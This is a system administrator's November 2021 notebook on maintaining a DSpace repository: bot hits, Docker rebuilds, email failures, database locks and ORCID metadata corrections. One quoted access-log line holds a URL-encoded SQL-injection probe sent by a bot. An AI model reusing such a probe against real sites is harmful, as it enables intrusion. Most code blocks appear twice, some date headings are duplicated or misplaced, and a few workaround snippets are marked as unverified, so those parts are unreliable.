<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">91.213.50.11 - - [03/Nov/2021:06:47:20 +0100] &#34;HEAD /bitstream/handle/10568/106239/U19ArtSimonikovaChromosomeInthomNodev.pdf?sequence=1%60%20WHERE%206158%3D6158%20AND%204894%3D4741--%20kIlq&amp;isAllowed=y HTTP/1.1&#34; 200 0 &#34;https://cgspace.cgiar.org:443/bitstream/handle/10568/106239/U19ArtSimonikovaChromosomeInthomNodev.pdf&#34; &#34;Mozilla/5.0 (X11; U; Linux i686; en-CA; rv:1.8.0.10) Gecko/20070223 Fedora/1.5.0.10-1.fc5 Firefox/1.5.0.10&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>91.213.50.11 - - [03/Nov/2021:06:47:20 +0100] &#34;HEAD /bitstream/handle/10568/106239/U19ArtSimonikovaChromosomeInthomNodev.pdf?sequence=1%60%20WHERE%206158%3D6158%20AND%204894%3D4741--%20kIlq&amp;isAllowed=y HTTP/1.1&#34; 200 0 &#34;https://cgspace.cgiar.org:443/bitstream/handle/10568/106239/U19ArtSimonikovaChromosomeInthomNodev.pdf&#34; &#34;Mozilla/5.0 (X11; U; Linux i686; en-CA; rv:1.8.0.10) Gecko/20070223 Fedora/1.5.0.10-1.fc5 Firefox/1.5.0.10&#34;
</span></span></code></pre></div><ul>
- Another is in China, and they grabbed 1,200 PDFs from the REST API in under an hour:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># zgrep 222.129.53.160 /var/log/nginx/rest.log.2.gz | wc -l
1178
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zgrep 222.129.53.160 /var/log/nginx/rest.log.2.gz | wc -l
</span></span><span style="display:flex;"><span>1178
</span></span></code></pre></div><ul>
- I will continue to split the Solr statistics back into year shards on DSpace Test (linode26)
  - Today I did all the 2018 stats…
- Update all Docker containers on AReS and rebuild OpenRXV:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
$ docker-compose build
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
</span></span><span style="display:flex;"><span>$ docker-compose build
</span></span></code></pre></div><ul>
- Then restart the server and start a fresh harvest
- Continue splitting the Solr statistics into yearly shards on DSpace Test (doing 2017, 2016, 2015, and 2014 today)
- Several users wrote to me last week to say that workflow emails haven't been working since 2021-10-21 or so
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ dspace test-email
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>About to send test email:
- To: fuuuu
- Subject: DSpace test email
- Server: smtp.office365.com
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Error sending email:
- Error: javax.mail.SendFailedException: Send failure (javax.mail.AuthenticationFailedException: 535 5.7.139 Authentication unsuccessful, the user credentials were incorrect. [AM5PR0701CA0005.eurprd07.prod.outlook.com]
)
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Please see the DSpace documentation for assistance.
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace test-email
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>About to send test email:
</span></span><span style="display:flex;"><span> - To: fuuuu
</span></span><span style="display:flex;"><span> - Subject: DSpace test email
</span></span><span style="display:flex;"><span> - Server: smtp.office365.com
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Error sending email:
</span></span><span style="display:flex;"><span> - Error: javax.mail.SendFailedException: Send failure (javax.mail.AuthenticationFailedException: 535 5.7.139 Authentication unsuccessful, the user credentials were incorrect. [AM5PR0701CA0005.eurprd07.prod.outlook.com]
</span></span><span style="display:flex;"><span>)
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Please see the DSpace documentation for assistance.
</span></span></code></pre></div><ul>
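One way to reproduce the SMTP AUTH attempt outside of DSpace would be swaks, to confirm whether the credentials themselves are at fault (a sketch; the account name, recipient, and port are placeholders):

```console
$ swaks --server smtp.office365.com --port 587 --tls \
    --auth LOGIN --auth-user fuuu@cgiar.org \
    --from fuuu@cgiar.org --to test@example.org
```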
- I sent a message to ILRI ICT to ask them to check the account/password
- I want to do one last test of the Elasticsearch updates on OpenRXV, so I got a snapshot of the latest Elasticsearch volume used on the production AReS instance:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># tar czf openrxv_esData_7.tar.xz /var/lib/docker/volumes/openrxv_esData_7
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># tar czf openrxv_esData_7.tar.xz /var/lib/docker/volumes/openrxv_esData_7
</span></span></code></pre></div><ul>
- Then on my local server:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ mv ~/.local/share/containers/storage/volumes/openrxv_esData_7/ ~/.local/share/containers/storage/volumes/openrxv_esData_7.2021-11-07.bak
$ tar xf /tmp/openrxv_esData_7.tar.xz -C ~/.local/share/containers/storage/volumes --strip-components<span style="color:#f92672">=</span><span style="color:#ae81ff">4</span>
$ find ~/.local/share/containers/storage/volumes/openrxv_esData_7 -type f -exec chmod <span style="color:#ae81ff">660</span> <span style="color:#f92672">{}</span> <span style="color:#ae81ff">\;</span>
$ find ~/.local/share/containers/storage/volumes/openrxv_esData_7 -type d -exec chmod <span style="color:#ae81ff">770</span> <span style="color:#f92672">{}</span> <span style="color:#ae81ff">\;</span>
# copy backend/data to /tmp <span style="color:#66d9ef">for</span> the repository setup/layout
$ rsync -av --partial --progress --delete provisioning@ares:/tmp/data/ backend/data
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ mv ~/.local/share/containers/storage/volumes/openrxv_esData_7/ ~/.local/share/containers/storage/volumes/openrxv_esData_7.2021-11-07.bak
</span></span><span style="display:flex;"><span>$ tar xf /tmp/openrxv_esData_7.tar.xz -C ~/.local/share/containers/storage/volumes --strip-components<span style="color:#f92672">=</span><span style="color:#ae81ff">4</span>
</span></span><span style="display:flex;"><span>$ find ~/.local/share/containers/storage/volumes/openrxv_esData_7 -type f -exec chmod <span style="color:#ae81ff">660</span> <span style="color:#f92672">{}</span> <span style="color:#ae81ff">\;</span>
</span></span><span style="display:flex;"><span>$ find ~/.local/share/containers/storage/volumes/openrxv_esData_7 -type d -exec chmod <span style="color:#ae81ff">770</span> <span style="color:#f92672">{}</span> <span style="color:#ae81ff">\;</span>
</span></span><span style="display:flex;"><span># copy backend/data to /tmp <span style="color:#66d9ef">for</span> the repository setup/layout
</span></span><span style="display:flex;"><span>$ rsync -av --partial --progress --delete provisioning@ares:/tmp/data/ backend/data
</span></span></code></pre></div><ul>
- This seems to work: all items, stats, and repository setup/layout are OK
- I merged my [Elasticsearch pull request](https://github.com/ilri/OpenRXV/pull/126) from last month into OpenRXV
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">RuntimeError
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Unable to find installation candidates for regex (2021.11.9)
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>at /usr/lib/python3.9/site-packages/poetry/installation/chooser.py:72 in choose_for
68│
69│ links.append(link)
70│
71│ if not links:
→ 72│ raise RuntimeError(
73│ &#34;Unable to find installation candidates for {}&#34;.format(package)
74│ )
75│
76│ # Get the best link
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>RuntimeError
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Unable to find installation candidates for regex (2021.11.9)
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>at /usr/lib/python3.9/site-packages/poetry/installation/chooser.py:72 in choose_for
</span></span><span style="display:flex;"><span> 68│
</span></span><span style="display:flex;"><span> 69│ links.append(link)
</span></span><span style="display:flex;"><span> 70│
</span></span><span style="display:flex;"><span> 71│ if not links:
</span></span><span style="display:flex;"><span> → 72│ raise RuntimeError(
</span></span><span style="display:flex;"><span> 73│ &#34;Unable to find installation candidates for {}&#34;.format(package)
</span></span><span style="display:flex;"><span> 74│ )
</span></span><span style="display:flex;"><span> 75│
</span></span><span style="display:flex;"><span> 76│ # Get the best link
</span></span></code></pre></div><ul>
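Two hypothetical workarounds for this kind of Poetry error, neither of which I verified here: relax the pin so Poetry can pick a release that actually has installation candidates, or clear Poetry's PyPI cache in case it is holding stale metadata:

```console
$ poetry add 'regex<2021.11.9'
$ poetry cache clear pypi --all
```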
- So that's super annoying… I'm going to try using Pipenv again…

## 2021-11-10
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ docker-compose down
$ sudo tar czf openrxv_esData_7-2021-11-14.tar.xz /var/lib/docker/volumes/openrxv_esData_7
$ cp -a backend/data backend/data.2021-11-14
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker-compose down
</span></span><span style="display:flex;"><span>$ sudo tar czf openrxv_esData_7-2021-11-14.tar.xz /var/lib/docker/volumes/openrxv_esData_7
</span></span><span style="display:flex;"><span>$ cp -a backend/data backend/data.2021-11-14
</span></span></code></pre></div><ul>
- Then I checked out the latest git commit, updated all images, and rebuilt the project:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
$ docker-compose build
$ docker-compose up -d
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
</span></span><span style="display:flex;"><span>$ docker-compose build
</span></span><span style="display:flex;"><span>$ docker-compose up -d
</span></span></code></pre></div><ul>
- Then I updated the repository configurations and started a fresh harvest
- Help Francesca from the Alliance with a question about embargos on CGSpace items
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
Purging 10893 hits from 87.203.87.141 in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 10893
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
</span></span><span style="display:flex;"><span>Purging 10893 hits from 87.203.87.141 in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 10893
</span></span></code></pre></div><ul>
- I did a bit more work documenting and tweaking the PostgreSQL configuration for CGSpace and DSpace Test in the Ansible infrastructure playbooks
  - I finally deployed the changes on both servers
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ vipsthumbnail AR<span style="color:#ae81ff">\ </span>RTB<span style="color:#ae81ff">\ </span>2020.pdf -s <span style="color:#ae81ff">600</span> -o <span style="color:#e6db74">&#39;%s.jpg[Q=85,optimize_coding,strip]&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ vipsthumbnail AR<span style="color:#ae81ff">\ </span>RTB<span style="color:#ae81ff">\ </span>2020.pdf -s <span style="color:#ae81ff">600</span> -o <span style="color:#e6db74">&#39;%s.jpg[Q=85,optimize_coding,strip]&#39;</span>
</span></span></code></pre></div><ul>
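Here `-s 600` bounds the thumbnail at 600 pixels and the `[Q=85,optimize_coding,strip]` suffix sets the JPEG quality, optimizes the Huffman coding tables, and strips metadata; the same settings could be applied to a whole directory with a simple loop (a sketch):

```console
$ for f in *.pdf; do vipsthumbnail "$f" -s 600 -o '%s.jpg[Q=85,optimize_coding,strip]'; done
```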
- I sent an email to the OpenArchives.org contact to ask for help with the OAI validator
  - Someone responded to say that there have been a number of complaints about this on the oai-pmh mailing list recently…
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt
Found 8352 hits from 138.201.49.199 in statistics
Found 9374 hits from 78.46.89.18 in statistics
Found 2112 hits from 93.179.69.74 in statistics
Found 1 hits from 31.6.77.23 in statistics
Found 5 hits from 34.209.213.122 in statistics
Found 86772 hits from 163.172.68.99 in statistics
Found 77 hits from 163.172.70.248 in statistics
Found 15842 hits from 163.172.71.24 in statistics
Found 172954 hits from 104.154.216.0 in statistics
Found 3 hits from 188.134.31.88 in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of hits from bots: 295492
</code></pre></div><h2 id="2021-11-27">2021-11-27</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt
</span></span><span style="display:flex;"><span>Found 8352 hits from 138.201.49.199 in statistics
</span></span><span style="display:flex;"><span>Found 9374 hits from 78.46.89.18 in statistics
</span></span><span style="display:flex;"><span>Found 2112 hits from 93.179.69.74 in statistics
</span></span><span style="display:flex;"><span>Found 1 hits from 31.6.77.23 in statistics
</span></span><span style="display:flex;"><span>Found 5 hits from 34.209.213.122 in statistics
</span></span><span style="display:flex;"><span>Found 86772 hits from 163.172.68.99 in statistics
</span></span><span style="display:flex;"><span>Found 77 hits from 163.172.70.248 in statistics
</span></span><span style="display:flex;"><span>Found 15842 hits from 163.172.71.24 in statistics
</span></span><span style="display:flex;"><span>Found 172954 hits from 104.154.216.0 in statistics
</span></span><span style="display:flex;"><span>Found 3 hits from 188.134.31.88 in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of hits from bots: 295492
</span></span></code></pre></div><h2 id="2021-11-27">2021-11-27</h2>
- Peter sent me corrections for the authors that I had sent him back in 2021-09
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/fix-metadata-values.py -i /tmp/authors.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.contributor.author -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">3</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/fix-metadata-values.py -i /tmp/authors.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.contributor.author -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">3</span>
</span></span></code></pre></div><ul>
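The `-m 3` is the metadata field ID for `dc.contributor.author`; if in doubt, it can be looked up in the metadata registry (a sketch):

```console
$ psql -d dspace -c "SELECT metadata_field_id FROM metadatafieldregistry WHERE element = 'contributor' AND qualifier = 'author';"
```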
- Then I imported to CGSpace and started a full Discovery re-index:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>real 272m43.818s
user 183m4.543s
sys 2m47.988
</code></pre></div><h2 id="2021-11-28">2021-11-28</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>real 272m43.818s
</span></span><span style="display:flex;"><span>user 183m4.543s
</span></span><span style="display:flex;"><span>sys 2m47.988
</span></span></code></pre></div><h2 id="2021-11-28">2021-11-28</h2>
- Run system updates on the AReS server (linode20), update all Docker containers, and reboot
- I am experimenting with pinning npm version 7 on the OpenRXV frontend because of these Angular errors:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">npm WARN EBADENGINE Unsupported engine {
npm WARN EBADENGINE package: &#39;@angular-devkit/architect@0.901.15&#39;,
npm WARN EBADENGINE required: { node: &#39;&gt;= 10.13.0&#39;, npm: &#39;^6.11.0 || ^7.5.6&#39;, yarn: &#39;&gt;= 1.13.0&#39; },
npm WARN EBADENGINE current: { node: &#39;v12.22.7&#39;, npm: &#39;8.1.3&#39; }
npm WARN EBADENGINE }
</code></pre></div><h2 id="2021-11-29">2021-11-29</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>npm WARN EBADENGINE Unsupported engine {
</span></span><span style="display:flex;"><span>npm WARN EBADENGINE package: &#39;@angular-devkit/architect@0.901.15&#39;,
</span></span><span style="display:flex;"><span>npm WARN EBADENGINE required: { node: &#39;&gt;= 10.13.0&#39;, npm: &#39;^6.11.0 || ^7.5.6&#39;, yarn: &#39;&gt;= 1.13.0&#39; },
</span></span><span style="display:flex;"><span>npm WARN EBADENGINE current: { node: &#39;v12.22.7&#39;, npm: &#39;8.1.3&#39; }
</span></span><span style="display:flex;"><span>npm WARN EBADENGINE }
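The warning says the Angular tooling wants npm 6 or 7 but the environment has npm 8, so the pin could be as simple as downgrading npm globally in the frontend image (a sketch; I have not confirmed where OpenRXV's frontend image installs npm, so this would go wherever Node is set up, e.g. a Dockerfile `RUN` step):

```console
$ npm install -g npm@7
```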
## 2021-11-29
- Tezira reached out to me to say that submissions on CGSpace are taking forever
- I see a definite increase in locks in the last few days:
- The locks are all held by dspaceWeb (XMLUI):
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ psql -c <span style="color:#e6db74">&#34;SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | sort | uniq -c | sort -n
1
1 ------------------
1 (1394 rows)
1 application_name
9 psql
1385 dspaceWeb
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#34;SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | sort | uniq -c | sort -n
</span></span><span style="display:flex;"><span> 1
</span></span><span style="display:flex;"><span> 1 ------------------
</span></span><span style="display:flex;"><span> 1 (1394 rows)
</span></span><span style="display:flex;"><span> 1 application_name
</span></span><span style="display:flex;"><span> 9 psql
</span></span><span style="display:flex;"><span> 1385 dspaceWeb
</span></span></code></pre></div><ul>
- I restarted PostgreSQL and the locks dropped down:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ psql -c <span style="color:#e6db74">&#34;SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | sort | uniq -c | sort -n
1
1 ------------------
1 (103 rows)
1 application_name
9 psql
94 dspaceWeb
</code></pre></div><h2 id="2021-11-30">2021-11-30</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#34;SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | sort | uniq -c | sort -n
</span></span><span style="display:flex;"><span> 1
</span></span><span style="display:flex;"><span> 1 ------------------
</span></span><span style="display:flex;"><span> 1 (103 rows)
</span></span><span style="display:flex;"><span> 1 application_name
</span></span><span style="display:flex;"><span> 9 psql
</span></span><span style="display:flex;"><span> 94 dspaceWeb
</span></span></code></pre></div><h2 id="2021-11-30">2021-11-30</h2>
- IWMI sent me ORCID identifiers for some new staff
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/iwmi-orcids.txt | grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort | uniq &gt; /tmp/2021-11-30-combined-orcids.txt
$ wc -l /tmp/2021-11-30-combined-orcids.txt
1348 /tmp/2021-11-30-combined-orcids.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/iwmi-orcids.txt | grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort | uniq &gt; /tmp/2021-11-30-combined-orcids.txt
</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-11-30-combined-orcids.txt
</span></span><span style="display:flex;"><span>1348 /tmp/2021-11-30-combined-orcids.txt
</span></span></code></pre></div><ul>
- After I combined them and removed duplicates, I resolved all the names using my `resolve-orcids.py` script:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/resolve-orcids.py -i /tmp/2021-11-30-combined-orcids.txt -o /tmp/2021-11-30-combined-orcids-names.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/resolve-orcids.py -i /tmp/2021-11-30-combined-orcids.txt -o /tmp/2021-11-30-combined-orcids-names.txt
</span></span></code></pre></div><ul>
- Then I updated some ORCID identifiers that had changed in the XML:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat 2021-11-30-fix-orcids.csv
cg.creator.identifier,correct
&#34;ADEBOWALE AKANDE: 0000-0002-6521-3272&#34;,&#34;ADEBOWALE AD AKANDE: 0000-0002-6521-3272&#34;
&#34;Daniel Ortiz Gonzalo: 0000-0002-5517-1785&#34;,&#34;Daniel Ortiz-Gonzalo: 0000-0002-5517-1785&#34;
&#34;FRIDAY ANETOR: 0000-0003-3137-1958&#34;,&#34;Friday Osemenshan Anetor: 0000-0003-3137-1958&#34;
&#34;Sander Muilerman: 0000-0001-9103-3294&#34;,&#34;Sander Muilerman-Rodrigo: 0000-0001-9103-3294&#34;
$ ./ilri/fix-metadata-values.py -i 2021-11-30-fix-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.creator.identifier -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">247</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2021-11-30-fix-orcids.csv
</span></span><span style="display:flex;"><span>cg.creator.identifier,correct
</span></span><span style="display:flex;"><span>&#34;ADEBOWALE AKANDE: 0000-0002-6521-3272&#34;,&#34;ADEBOWALE AD AKANDE: 0000-0002-6521-3272&#34;
</span></span><span style="display:flex;"><span>&#34;Daniel Ortiz Gonzalo: 0000-0002-5517-1785&#34;,&#34;Daniel Ortiz-Gonzalo: 0000-0002-5517-1785&#34;
</span></span><span style="display:flex;"><span>&#34;FRIDAY ANETOR: 0000-0003-3137-1958&#34;,&#34;Friday Osemenshan Anetor: 0000-0003-3137-1958&#34;
</span></span><span style="display:flex;"><span>&#34;Sander Muilerman: 0000-0001-9103-3294&#34;,&#34;Sander Muilerman-Rodrigo: 0000-0001-9103-3294&#34;
</span></span><span style="display:flex;"><span>$ ./ilri/fix-metadata-values.py -i 2021-11-30-fix-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.creator.identifier -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">247</span>
</span></span></code></pre></div><ul>
- Tag existing items from IWMI's new authors with ORCID iDs using `add-orcid-identifiers-csv.py` (7 new metadata fields added):
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat 2021-11-30-add-orcids.csv
dc.contributor.author,cg.creator.identifier
&#34;Liaqat, U.W.&#34;,&#34;Umar Waqas Liaqat: 0000-0001-9027-5232&#34;
&#34;Liaqat, Umar Waqas&#34;,&#34;Umar Waqas Liaqat: 0000-0001-9027-5232&#34;
&#34;Munyaradzi, M.&#34;,&#34;Munyaradzi Junia Mutenje: 0000-0002-7829-9300&#34;
&#34;Mutenje, Munyaradzi&#34;,&#34;Munyaradzi Junia Mutenje: 0000-0002-7829-9300&#34;
&#34;Rex, William&#34;,&#34;William Rex: 0000-0003-4979-5257&#34;
&#34;Shrestha, Shisher&#34;,&#34;Nirman Shrestha: 0000-0002-0996-8611&#34;
